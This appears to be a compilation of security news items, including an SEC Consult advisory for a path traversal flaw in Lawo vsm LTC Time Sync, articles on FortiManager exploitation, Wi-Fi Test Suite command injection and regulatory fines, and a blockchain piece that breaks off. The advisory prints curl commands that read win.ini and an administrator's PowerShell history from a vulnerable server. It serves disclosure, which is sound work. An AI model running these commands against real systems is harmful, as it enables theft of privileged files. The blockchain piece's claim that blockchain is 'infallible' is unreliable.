Lawo AG vsm LTC Time Sync versions prior to 4.5.6.0 suffer from a path traversal vulnerability.

    SEC Consult Vulnerability Lab Security Advisory < 20241024-0 >=======================================================================              title: Unauthenticated Path Traversal Vulnerability            product: Lawo AG - vsm LTC Time Sync (vTimeSync) vulnerable version: <4.5.6.0      fixed version: 4.5.6.0         CVE number: CVE-2024-6049             impact: high           homepage: https://docs.lawo.com/vsm-ip-broadcast-control-system/vsmgear-user-manual/discontinued-products/vsmltc              found: 2024-01-11                 by: Sandro Einfeldt                     Dennis Jung                     SEC Consult Vulnerability Lab                     An integrated part of SEC Consult, an Eviden business                     Europe | Asia                     https://www.sec-consult.com=======================================================================Vendor description:-------------------"Lawo designs and manufactures video, audio, control and monitoringtechnology for broadcast, performing arts, installed sound and corporateapplications. All products are developed in Germany and manufacturedaccording to highest quality standards at the company's headquartersin the Rhine valley town of Rastatt, Germany."Source: https://lawo.com/company/about-us/Business recommendation:------------------------The vendor provides a patch which should be installed immediately.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)The web interface of vsm LTC Time Sync (vTimeSync) is vulnerable to a pathtraversal vulnerability. By sending a specially crafted HTTP request, anunauthenticated remote attacker can download arbitrary files from the vulnerablesystem. As a limitation, the exploitation is only possible if the requested filehas a file extension, e.g. .exe or .txt.The web server is running with highest SYSTEM privileges per default, whichenables an attacker to gain access to privileged files.Proof of concept:-----------------1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)To exploit the vulnerability it is sufficient to use the following curl-commandto send a request to the vulnerable web server:curl http://$host:8033/.../.../.../.../.../.../.../.../.../<Path to file>For example, the following command can be used to request the default filewin.ini:curl http://$host:8033/.../.../.../.../.../.../.../.../.../Windows/win.iniIf the application is running with SYSTEM-privileges (default), the followingcommand can be used to exfiltrate the Powershell history of the Windowsadministrator, which might leak sensitive information:curl http://$host:8033/.../.../.../.../.../.../.../.../.../Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txtVulnerable / tested versions:-----------------------------The following version has been tested which was the latest version availableat the time of the test:* 4.4.12.0According to the vendor, versions before 4.5 are affected and v4.5.6.0includes the fixes.Vendor contact timeline:------------------------2024-01-22: Contacting vendor through info@lawo.com; no response2024-02-14: Contacting vendor again, adding support@lawo.com email2024-02-15: Vendor response (support), asking for details.2024-02-15: Asking where to submit the advisory, whether encryption            is supported.2024-02-16: Vendor, submit either via email or JIRA; informing us            that broadcasting software security levels are not that high            as the network is usually not connected to the outside.2024-02-16: Submitting security advisory to vendor JIRA; explaining            our severity estimation and risks by exposing the affected            service.2024-02-20: Vendor has taken a look at the advisory, asking whether            HTTPS would solve the issue.            Telling vendor, that HTTPS won't fix the problem, describing            the security issue again, providing link to OWASP path traversal            page, etc.2024-02-21: Vendor cannot reproduce issue in Chrome browser.            Explaining how we exploited the vulnerability.2024-03-11: Asking for a status update; no update from R&D yet, vendor will            keep us updated.2024-04-09: Asking for a status update, whether vendor needs further support.2024-04-10: Vendor pinged their PM, will let us know as soon as feedback is            available.2024-05-15: Vendor recently introduced "a login" for vTimeSync which only            lets people with a username and a PW access the page. Vendor asks            us whether this would cover the vulnerability.2024-05-23: Telling the vendor that a login does not fix the identified            path traversal issue; no response.2024-06-17: Asking for a status update again.2024-06-17: Vendor support has forwarded our feedback internally.2024-09-25: Asking for a status update, CVE and affected/fixed version number.            Preparing for release in October.2024-09-25: Vendor support still has no updates, asking product management and            RnD team again.2024-09-26: Asking the vendor to keep us informed.2024-09-27: Vendor support will review the case next Wednesday.2024-10-10: Asking for a status update.            Vendor has no news, this topic is in the R&D backlog, no date yet            when development will be started.2024-10-11: Vendor states that the developers have already fixed the issue in            the current release.2024-10-17: Asking for the version numbers (affected / patched).            Vendor provides download to version 4.5.6.0 including changelog.            Changelog contains information about security fix in version 4.4.13,            but also changes regarding SSL/HTTPS and logon feature in 4.5.0 and 4.5.1.            Asking the vendor again, in which version the issue has been            fixed.            Vendor informs us the problem is fixed after v4.5 and we should use            the latest version.2024-10-21: Confirming version numbers, sending draft advisory to vendor and            assigned CVE-2024-6049.2024-10-24: Coordinated release of security advisory.Solution:---------The vendor provides a patch in versions after v4.5 which can be downloaded from thefollowing URL, such as version 4.5.6.0.https://lawo.com/lawo-downloads/Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Sandro Einfeldt, Dennis Jung, Johannes Greil / @2024

Lawo AG vsm LTC Time Sync Path Traversal

Red Hat Security Advisory 2024-8461-03 - An update for krb5 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8461.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: krb5 security updateAdvisory ID:        RHSA-2024:8461-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8461Issue date:         2024-10-24Revision:           03CVE Names:          CVE-2024-3596====================================================================Summary: An update for krb5 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* freeradius: forgery attack (CVE-2024-3596)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3596References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263240

Red Hat Security Advisory 2024-8461-03

Cybersecurity is mission-driven, meaningful work that coincides with the service branches' goals to protect, defend, and create a safer world.

Source: William Mullins via Alamy Stock Photo

COMMENTARY  
When I stepped foot onto Mountain Home Air Force Base in 2003, I had no way of knowing how much my technical and leadership skills would flourish over the course of my career in the US Air Force — but I did know I had found a group of disciplined, mission-driven individuals who were all working toward a common goal. And that was special. 

When it came time to transition out of the military last year, I was faced with not only leaving the branch of service I had dedicated my entire professional life to but also having to find who I was and what career path I wanted to pursue for myself. That's no easy task when you've been entrenched in a team-oriented environment for years at a time — in my case, 20. I was afraid I'd never find that sense of community again … until I found the cybersecurity field.  

**Where It All Began**

I attended community college for about a year before I enlisted in the Air Force and began working as a data maintenance technician. I eventually integrated with the Air Force's network team, where I got my feet wet in IT. Over the next 10 years, I worked on small clandestine networks up to enterprise-level, before the military shifted its focus to securing networks.  

The further I ventured into securing domains, the stronger my passion grew for that area. During my time stationed at MacDill Air Force Base, I worked for the Joint Communications Support Element (JCSE), and one of my supervisors approached me about the Certified Information Systems Security Professional (CISSP) certification from ISC2. He saw that I had what it took to sit for the exam, and I began the process. 

**Five Letters and 600 Podcast Episodes Later**

The CISSP certification was not only a testament to the hard work that I had put in throughout my career, but it also served as a key to my progression in the field. It changed my position in the game and my accessibility to opportunities. When having a conversation with those more senior than me, I felt confident and highly respected with the weight of that CISSP by my name. 

I believe to this day that the CISSP is what led me to being able to secure my first job in the corporate world, and acted as a launching pad for my podcast, "The Other Side of the Firewall." That podcast has grown my network monumentally, and having that validation by my name makes it easy to have conversations with everyone from entry-level professionals to CEOs of major companies. We're now more than 600 episodes into the podcast and counting. However, the journey to get to where I am today hasn't all been rainbows and butterflies. 

**The Highs and Lows**

One of the easier components of making the military-to-corporate transition was the networking aspect. During my time in the military, I had worked with phenomenal clients who supported me even after I swapped lace-up boots for a suit. Despite the fact that I was looking for a job at a historically bad time for the tech industry (the early 2023 layoff wave), my connections landed me a job at a data privacy and security company in Georgia.  

My boss at this company was a US Marine veteran, who was able to lead me through what ended up being the hardest part of my switch to corporate life: the lingo. I had to learn to explain how the technical skills I gained in the military translated to be applicable to the clients I was working for in the private sector. Having someone to guide me through that transition from the military to the corporate world who knew how to break me out of my military jargon comfort zone was life changing. 

**Why Cyber?**

I highly encourage anyone transitioning out of the military and looking for a mission-driven line of work to explore the cybersecurity field. With the rate that emerging technologies and the threat landscape are evolving, the demand for cybersecurity professionals is at an all-time high. It's a mission-driven, meaningful line of work that coincides with your service branches' goals to protect, defend, and create a safer world.  

Explore entry-level certifications such as the ones through ISC2, trainings and bootcamps that can help you get a foot in the door, and don't give up if the transition to the corporate world isn't seamless. Cybersecurity is a field that offers continued opportunities to increase your skills, learn from those around you, and make changes that have a direct impact on securing our increasingly digital world. As veterans transition into civilian life and look to find stable, fulfilling careers, I encourage them to give cybersecurity a shot. It's where I've found my tribe again, and I'm forever thankful for the people and programs that helped me along the way. 

**About the Author**

Information Technology Security Analyst, Buddobot

Ryan Williams Sr. is a seasoned cybersecurity consultant and virtual chief information security officer (vCISO) specializing in helping businesses navigate complex governance, risk, and compliance (GRC) challenges. By day, he serves as an IT security analyst for Buddobot, supporting the Independent Verification & Validation (IV&V) division of the US Department of Housing and Urban Development's Office of the Chief Information Officer (OCIO). Nights and weekends, Ryan leads RAM Cyber Consulting and Assessments LLC, delivering tailored cybersecurity solutions such as NIST CSF 2.0 readiness assessments, cyber policy writing, and consulting services to safeguard organizations across various industries.

My Journey From the Air Force to Cybersecurity

A security flaw impacting the Wi-Fi Test Suite could enable unauthenticated local attackers to execute arbitrary code with elevated privileges.
The CERT Coordination Center (CERT/CC) said the vulnerability, tracked as CVE-2024-41992, said the susceptible code from the Wi-Fi Alliance has been found deployed on Arcadyan FMIMG51AX000J routers.
"This flaw allows an unauthenticated local attacker to

Vulnerability / Wi-Fi Security

A security flaw impacting the Wi-Fi Test Suite could enable unauthenticated local attackers to execute arbitrary code with elevated privileges.

The CERT Coordination Center (CERT/CC) said the vulnerability, tracked as **CVE-2024-41992**, said the susceptible code from the Wi-Fi Alliance has been found deployed on Arcadyan FMIMG51AX000J routers.

"This flaw allows an unauthenticated local attacker to exploit the Wi-Fi Test Suite by sending specially crafted packets, enabling the execution of arbitrary commands with root privileges on the affected routers," the CERT/CC said in an advisory released Wednesday.

Wi-Fi Test Suite is an integrated platform developed by the Wi-Fi Alliance that automates testing Wi-Fi components or devices. While open-source components of the toolkit are publicly available, the full package is available only to its members.

SSD Secure Disclosure, which released details of the flaw back in August 2024, described it as a case of command injection that could enable a threat actor to execute commands with root privileges. It was originally reported to the Wi-Fi Alliance in April 2024.

An independent researcher, who goes by the online alias "fj016" has been credited with uncovering and reporting the security shortcomings. The researcher has also made available a proof-of-concept (PoC) exploit for the flaw.

CERT/CC noted that the Wi-Fi Test Suite is not intended for use in production environments, and yet has been discovered in commercial router deployments.

"An attacker who successfully exploits this vulnerability can gain full administrative control over the affected device," it said.

"With this access, the attacker can modify system settings, disrupt critical network services, or reset the device entirely. These actions can result in service interruptions, compromise of network data, and potential loss of service for all users dependent on the affected network."

In the absence of a patch, vendors who have included the Wi-Fi Test Suite are recommended to either remove it completely from production devices or update it to version 9.0 or later to mitigate the risk of exploitation.

The Hacker News has reached out to the Wi-Fi Alliance for further comment, and we will update the story when we hear back.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Discover Command Injection Flaw in Wi-Fi Alliance's Test Suite

Renewable energy firms deal with a large cyberattack surface area, given the distributed nature of power generation and more pervasive connectivity.

Source: KanawatTH via Shutterstock

Renewable energy companies lag behind their more traditional peers when it comes to the cybersecurity readiness of their infrastructure, raising concerns that attackers targeting critical infrastructure could find easier prey among "green" energy firms.

In a study of 250 energy companies worldwide, oil and natural-gas firms scored the highest — with the average company scoring a 94, or "A" — while the lowest scores belonged to renewable energy companies, which scored a median of 85, or a "B." Green energy firms tend to have distributed generation infrastructure (such as rooftop solar or wind turbines) and are usually more Internet-connected than traditional energy companies — both attributes that can undermine their defensive posture, says Ryan Sherstobitoff, senior vice president for threat research at SecurityScorecard, the cybersecurity risk firm that conducted the study.

Overall, the attack surfaces between traditional energy infrastructure and renewable energy infrastructure can be quite different, he says.

"Oil and gas have legacy technologies, but these legacy technologies are most likely not Internet-facing," Sherstobitoff says. "Whereas the cybersecurity posture of renewable energy may not necessarily be \[to the level of other\] critical infrastructure itself ... but nonetheless has public-facing portals and other public-facing issues."

The concerns come as the US and other countries invest in green energy infrastructure and scramble to put in place more cybersecurity defenses to protect their critical infrastructure. Nation-state groups have targeted the critical infrastructure of the US and its allies, and while the distributed nature of green energy generation could mitigate widespread outages, their Internet connections represent a weak point, according to the SecurityScorecard report, which was in collaboration with consultancy KPMG.

**Distributed Green Systems Harder to Defend**

Overall, the energy sector did quite well in the survey of firms. Of the 250 organizations on which data was collected, 81% either scored an A or B. Only 8% of energy firms showed signs of compromise in their external infrastructure, but two-thirds of the breaches were connected to third-party partners, SecurityScorecard reported.

Attacks could prevent renewable energy companies from managing their generation sites to disrupting consumers' power, Sherstobitoff says.

"You could imagine disrupting the ability for these renewable energy devices to connect back and phone home, then you have chaos, because then they can't check in, can't get their status," he says. "If \[the infrastructure\] depends on getting a status code in order to function, it needs to connect back ... that's another breaking function."

Already, some green energy infrastructure has fallen prey to attackers. Charging stations for electric vehicles typically require connectivity, which makes them vulnerable to both compromise and disruption. In 2022, pro-Ukrainian hacktivists compromised chargers in Moscow to display messages of support for Ukraine. In 2019, a solar firm could no longer manage its 500 megawatts of wind and solar sites in the western US after a denial-of-service attack targeted an unpatched firewall, the FBI stated in a Private Industry Notification (PIN) in July.

The risk could extend all the way to homeowners, who increasingly have adopted rooftop solar and need to be connected to be able to deliver their solar power and be credited.

"This issue will only become more important as small solar systems continue to grow. When every house is a power plant, every house is a target," Morten Lund, of counsel for Foley & Lardner LLP, wrote in a brief directed at energy companies. "In many ways, the distributed nature of solar energy provides significant protection against catastrophic failures. But without sufficient protection at the project level, this strength quickly becomes a weakness."

**Third-Party Suppliers Cause Concern**

The energy sector is also open to greater third-party risk, with 47% of breaches of energy companies involving a third party, compared with 29% across all industries. In addition, many green energy projects tend to be locally managed or developed by a smaller startup, which could raise risks, especially as the US rushes to adopt more green infrastructure, the FBI stated in its PIN.

"With federal and local legislature advocating for renewable energies, the industry will expand to keep pace, providing more opportunities and targets for malicious cyber actors," the FBI stated.

The US National Strategy for Cyberspace calls out renewable energy as a key industry to defend online. Rich countries tend to have better defenses than poorer economies, as they have better regulations and organizations have more budget to spend on security.

Regulations continue to be the top reason energy firms invest in cybersecurity, with nearly half of companies (49%) citing regulatory requirements among their top three reasons for assigning budget, compared with 38% citing a cybersecurity incident or near miss affecting their company, according to risk management consultancy DNV's "Energy Cyber Priority 2023" report.

"Most renewable sites have not been developed with cybersecurity in mind, but several companies are picking up quickly," says Auke Huistra, DNV Cyber's industrial and operational technology cybersecurity director. "From our engagements, we have seen immature but also mature green energy companies. What we do see is that \[cybersecurity gets\] more and more attention ... driven by incidents in the industry as well as regulations."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Cybersecurity Isn't Easy When You're Trying to Be Green

Fortinet and Mandiant investigated the mass exploitation of FortiManager devices via CVE-2024-47575, impacting 50+ systems across industries. Threat…

Fortinet and Mandiant investigated the mass exploitation of FortiManager devices via CVE-2024-47575, impacting 50+ systems across industries. Threat actor UNC5820 used the flaw for data theft and unauthorized access.

Fortinet and Google’s Mandiant collaborated in October 2024 to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised devices across various industries due to CVE-2024-47575.

This vulnerability, which allows attackers to execute arbitrary code on compromised FortiManager devices, has been actively exploited by a threat group tracked by Mandiant as UNC5820.

FortiManager is a centralized management solution by Fortinet that enables organizations to manage and configure multiple Fortinet security devices, such as FortiGate firewalls, from a single interface.

According to their blog post, the attack began on June 27, 2024, and continued through September 22, 2024, with further data exfiltration and potential persistence attempts. The threat actor exploited the FortiManager vulnerability, using inbound and outbound connections, file creation, and modification to gain unauthorized access and steal sensitive information.

Their primary objective seems to be stealing configuration data from compromised FortiManager devices. This data included detailed information about managed Fortinet devices, usernames, and FortiOS256-hashed passwords.

Threat actors exploited vulnerable FortiManager devices by connecting to IP address 45.32.41.202 on port 541. They staged configuration files containing critical data about managed devices in a compressed archive named /tmp/.tm.

Shortly after, outbound network traffic was observed, with varying destination IP addresses across incidents. In one case, the threat actor’s device was registered with the compromised FortiManager, suggesting an attempt to establish long-term access.

The report provides a detailed timeline of observed attacker activity, including specific dates, times, and network traffic details. This can help identify potential compromises within your own environment.

Threat actor’s device added to Global Objects database and Unauthorized device listed in FortiManager console (Via Google Mandiant)

Tim Peck, Senior Threat Researcher, Securonix weighed in on the situation, urging companies to install patches.

“The risk posed by CVE-2024-47575 is significant, especially for large enterprises due to its potential for remote code execution. Damages can range from unauthorized access and data theft to critical disruptions,” Tim warned.

“Affected organizations should apply the October 24 patch, review access logs for suspicious activity, and ensure a strong incident response plan. This vulnerability underscores the need for timely patching, network segmentation, and continuous monitoring.”

This attack campaign explains the trend of cybercriminals leveraging zero-day vulnerabilities to gain unauthorized access to sensitive systems. In the past, we have seen similar attacks targeting other critical infrastructure components, such as routers, firewalls, and industrial control systems.

The exploitation of this FortiManager vulnerability is particularly concerning due to the widespread use of FortiGate devices in enterprise environments. These devices are often used to protect critical infrastructure and data, making them a valuable target for attackers.

Potential mitigation measures include limiting access to the FortiManager admin portal to authorized internal IP addresses, limiting communication to only permitted FortiGate devices, and denying registration attempts from unknown devices.

Google Cloud provides detection rules for Google SecOps Enterprise+ customers, and organizations can develop custom SIEM searches based on provided IOCs and monitor FortiManager logs for suspicious activity.

1.  CISA and Fortinet Warns of New FortiOS Zero-Day Flaws
2.  Hackers Exploiting Critical Flaws in Fortinet VPN – FBI-CISA
3.  Hackers dump login Details of Fortinet VPN users in plain-text
4.  Hackers leak login credentials of vulnerable Fortinet SSL VPNs
5.  Fortinet Confirms Data Breach as Hacker Leaks 440GB of Data

UNC5820 Exploits FortiManager Zero-Day Vulnerability (CVE-2024-47575)

Artificial Intelligence (AI) has rapidly evolved from a futuristic concept to a potent weapon in the hands of bad actors. Today, AI-based attacks are not just theoretical threats—they're happening across industries and outpacing traditional defense mechanisms. 
The solution, however, is not futuristic. It turns out a properly designed identity security platform is able to deliver defenses

Artificial Intelligence / Identity Security

Artificial Intelligence (AI) has rapidly evolved from a futuristic concept to a potent weapon in the hands of bad actors. Today, AI-based attacks are not just theoretical threats—they're happening across industries and outpacing traditional defense mechanisms.

The solution, however, is not futuristic. It turns out a properly designed identity security platform is able to deliver defenses against AI impersonation fraud. Read more about how a secure-by-design identity platform can eliminate AI deepfake fraud and serve as a critical component in this new era of cyber defense.

****The Growing Threat of AI Impersonation Fraud****

Recent incidents highlight the alarming potential of AI-powered fraud:

*   A staggering $25 million was fraudulently transferred during a video call where deepfakes impersonated multiple executives.
*   KnowBe4, a cybersecurity leader, was duped by deepfakes during hiring interviews, allowing a North Korean attacker to be onboarded to the organization.
*   CEO of WPP, the largest ad firm in the world, was targeted with a deepfake attempting to solicit money and personal details over virtual conferencing.
*   US Senator targeted by a deepfake of a Ukrainian diplomat on a Zoom call in an attempt at election interference.

These cases underscore a critical truth: attackers have and will continue to exploit every tool at their disposal to breach organizations, and AI has simplified their efforts significantly while lowering costs.

****The Limitations of Current Solutions****

While the cybersecurity industry has responded with deepfake detection tools and enhanced end-user training, these approaches are fundamentally flawed because:

*   The AI Arms Race: Deepfake detection and deepfake generators are locked in a perpetual struggle since one model trains the other, with neither side maintaining a lasting advantage
*   Probabilistic Detection: Detection solutions offer probabilistic defenses, leaving room for error
*   Burden on End Users: Relying on user vigilance places an unrealistic expectation on individuals to discern increasingly sophisticated deceptions.

****A Paradigm Shift: AI Defense as an Extension of Identity Security****

AI impersonation fraud is yet another manifestation of weak identity security. In these attacks, bad actors still must first compromise the identity of a legitimate user undetected in order to convincingly extort victims for financial gain and political influence.

While many AI detection tools make best guesses at identifying deepfakes, a secure-by-design identity platform can provide cryptographic assurances that a user is who they say they are and using a trusted and compliant device.

**Key advantages of a secure-by-design identity platform include:**

*   **Strong identity assurance:** Phishable credentials make it easy for malicious actors to assume the identity of a legitimate user. Beyond Identity only authenticates users with phishing-resistant credentials using device-bound passkeys to eliminate identity-based attacks.
*   **Device security compliance:** Only allow recognized devices that pass your security checks to access company resources, including video conferencing and other collaboration tools
*   **Holistic risk assessment:** Use real-time user and device risk signals captured by our platform and risk signals gathered from other security tools in your environment to make precise and adaptive access decisions.

****Introducing RealityCheck by Beyond Identity****

Beyond Identity's RealityCheck extends our secure-by-design identity platform to deliver defense against AI deepfake fraud. In addition to strong identity assurance, device security compliance, and holistic risk assessments, this feature provides **visual attestations of identity and device security** within video conferencing and communication tools.

Ensuring identity and device security is the necessary first step to successfully preventing AI deepfake fraud. The second step is to make that assurance known to end-users with a tamper-proof visual badge so they can collaborate confidently with the right person – this is what RealityCheck delivers. Currently, RealityCheck is integrated with Zoom and Microsoft Teams with additional integrations with Slack and email coming soon.

****Ready to defend your organization from AI deepfake fraud?****

A secure-by-design identity platform is defined by its ability to eradicate identity risks from the ground up, providing robust defense against current and emerging threats, including MFA bypass, phishing, and AI impersonation fraud.

RealityCheck is part of Beyond Identity's Secure Access Platform, the only IAM platform architected to eliminate identity attacks. With the changing landscape of identity-based threats, extending our core security assurances to defend against AI impersonation attacks became imperative.

With RealityCheck by Beyond Identity, you can safeguard video conferencing tools with secure-by-design identity foundations and visual, tamper-proof attestations. Get in touch for a personalized demo to see firsthand how the solution works.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Eliminating AI Deepfake Threats: Is Your Identity Security AI-Proof?

The U.S. Securities and Exchange Commission (SEC) has charged four current and former public companies for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020.
The SEC said the companies – Avaya, Check Point, Mimecast, and Unisys – are being penalized for how they handled the disclosure process in the aftermath of

Regulatory Compliance / Data Breach

The U.S. Securities and Exchange Commission (SEC) has charged four current and former public companies for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020.

The SEC said the companies – Avaya, Check Point, Mimecast, and Unisys – are being penalized for how they handled the disclosure process in the aftermath of the SolarWinds Orion software supply chain incident and downplaying the extent of the breach, thereby infringing the Securities Act of 1933, the Securities Exchange Act of 1934, and related rules under them.

To that end, Avaya will pay a fine of $1 million, Check Point will pay $995,000, Mimecast will pay $990,000, and Unisys will pay $4 million to settle the charges. In addition, the SEC has charged Unisys with disclosure controls and procedures violations.

"While public companies may become targets of cyberattacks, it is incumbent upon them to not further victimize their shareholders or other members of the investing public by providing misleading disclosures about the cybersecurity incidents they have encountered," said Sanjay Wadhwa, acting director of the SEC's Division of Enforcement.

"Here, the SEC's orders find that these companies provided misleading disclosures about the incidents at issue, leaving investors in the dark about the true scope of the incidents."

According to the SEC, all four companies learned the Russian threat actors behind the SolarWinds Orion hack had accessed their systems in an unauthorized manner, but chose to minimize the scope of the incident in their public disclosures.

Unisys, the independent federal agency said, chose to describe the risks arising as a result of the intrusion as "hypothetical" despite being aware of the fact that the cybersecurity events led to the exfiltration of more than 33 GB of data on two different occasions.

The investigation also found that Avaya stated the threat actor had accessed a "limited number" of the company's email messages, when, in reality, it was aware that the attackers had also accessed at least 145 files in its cloud environment.

As for Check Point and Mimecast, the SEC took issue with how they painted the risks from the breach in broad strokes, with the latter also failing to disclose the nature of the code the threat actor exfiltrated and the number of encrypted credentials the threat actor accessed.

"In two of these cases, the relevant cybersecurity risk factors were framed hypothetically or generically when the companies knew the warned of risks had already materialized," Jorge G. Tenreiro, acting chief of the Crypto Assets and Cyber Unit, said. "The federal securities laws prohibit half-truths, and there is no exception for statements in risk-factor disclosures."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SEC Charges 4 Companies Over Misleading SolarWinds Cyberattack Disclosures

The Irish data protection watchdog on Thursday fined LinkedIn €310 million ($335 million) for violating the privacy of its users by conducting behavioral analyses of personal data for targeted advertising.
"The inquiry examined LinkedIn's processing of personal data for the purposes of behavioral analysis and targeted advertising of users who have created LinkedIn profiles (members)," the Data

Digital Advertising / Privacy

The Irish data protection watchdog on Thursday fined LinkedIn €310 million ($335 million) for violating the privacy of its users by conducting behavioral analyses of personal data for targeted advertising.

"The inquiry examined LinkedIn's processing of personal data for the purposes of behavioral analysis and targeted advertising of users who have created LinkedIn profiles (members)," the Data Protection Commission (DPC) said. "The decision \[...\] concerns the lawfulness, fairness and transparency of this processing."

The penalty has been issued under the European Union's (E.U.) General Data Protection Regulation (GDPR), an information privacy law that establishes a framework for the collection, processing, storage, and transfer of personal data in the E.U. and the European Economic Area (EEA). It went into effect on May 25, 2018.

The probe, which was initiated following a complaint made to the French Data Protection Authority in 2018, found that LinkedIn infringed on three different GDPR principles concerning transparency and fairness: Article 6 GDPR and Article 5(1)(a), Articles 13(1)(c) and 14(1)(c), and Article 5(1)(a).

This includes not seeking users' explicit consent or sufficiently informing them prior to processing third-party data of its members and using legitimate interests as a legal basis for processing first-party data for targeted advertising. In addition to the fine, LinkedIn has been given three months to bring its European operations into compliance with the GDPR.

The DPC said the consent obtained in a manner that complies with GDPR must be freely given, specific, informed, and an unambiguous indication of the data subject's wishes. It also said the processing must be carried out in a fair and transparent manner.

"The lawfulness of processing is a fundamental aspect of data protection law and the processing of personal data without an appropriate legal basis is a clear and serious violation of a data subject's fundamental right to data protection," DPC Deputy Commissioner Graham Doyle said in a statement.

Commenting on the development, the Microsoft-owned professional networking platform said "while we believe we have been in compliance with the General Data Protection Regulation (GDPR), we are working to ensure our ad practices meet this decision by the IDPC's deadline."

In related news, Austrian privacy non-profit noyb (short for None Of Your Business) filed a complaint with France's data protection authority against social media company Pinterest for resorting to "legitimate interests" to track users' activity by default to serve targeted ads without their consent.

"Instead of seeking opt-in consent under Article 6(1)(a) GDPR, it falsely claims to have a 'legitimate interest' in processing people's personal data under Article 6(1)(f) GDPR," noyb said. "Tracking is turned on by default and would require an objection (opt-out) by each user to stop."

A Pinterest spokesperson told TechCrunch that its "approach to personalized advertising is GDPR compliant."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations

Blockchain, known for its role in cybersecurity, fintech, and cryptocurrencies, raises the question: Is it secure? Absolutely! With…

Blockchain, known for its role in cybersecurity, fintech, and cryptocurrencies, raises the question: Is it secure? Absolutely! With its decentralized nature, encrypted transactions, and transparency, blockchain ensures data integrity and protection from tampering, making it a top choice for secure technology.

Blockchain is often celebrated as a trailblazer for the future across cybersecurity, fintech, and cryptocurrencies. However, a frequently asked question concerning the technology is, is blockchain secure? Most certainly! Here’s why:

At the heart of blockchain lies its decentralized network of computers recording transactions in a way that makes them (nearly) immune to tampering. The data is constructed in a form where each “block” is linked to the one before it, hence forming a chain. To alter or delete some block, one would need to repeat the process for all the other blocks — something that’s extremely challenging in large networks. 

****Encryption and Transparency****

The first step in blockchain security is encryption. Each transaction is encoded, and the network’s participants have various cryptographic keys. Therefore, hackers would have difficulty obtaining unauthorized access to the information. However, confidentiality aside, blockchain’s transparency serves as its foundation for security.

In public blockchains (Bitcoin, for example), anyone can see transactions, although they cannot change them. This is because when something is recorded, it is permanent and available to everyone using the network.

Public and private blockchains distinctively signify two different types of security. Public blockchains (such as Bitcoin) and, by extension, more decentralized ones are open to anyone who wants to join and participate in the approval of new blocks. Private blockchains are strictly regulated, focusing on transactions unique to a particular business or group. Both types use plenty of security measures, but private networks tend to have additional controls and verifications.

****Decentralization is Key****

Decentralization is another significant security benefit of blockchain. Since traditional databases are centralized, they reside in one place or data center owned by a single entity making them an easy target for hackers. Blockchain data is stored simultaneously in multiple locations, making it more difficult to target all of the copies at once. Here is the safety harness: all connected by infallible cryptographic chains; hence, top-grade security measures.

****Smart Contracts and AI****

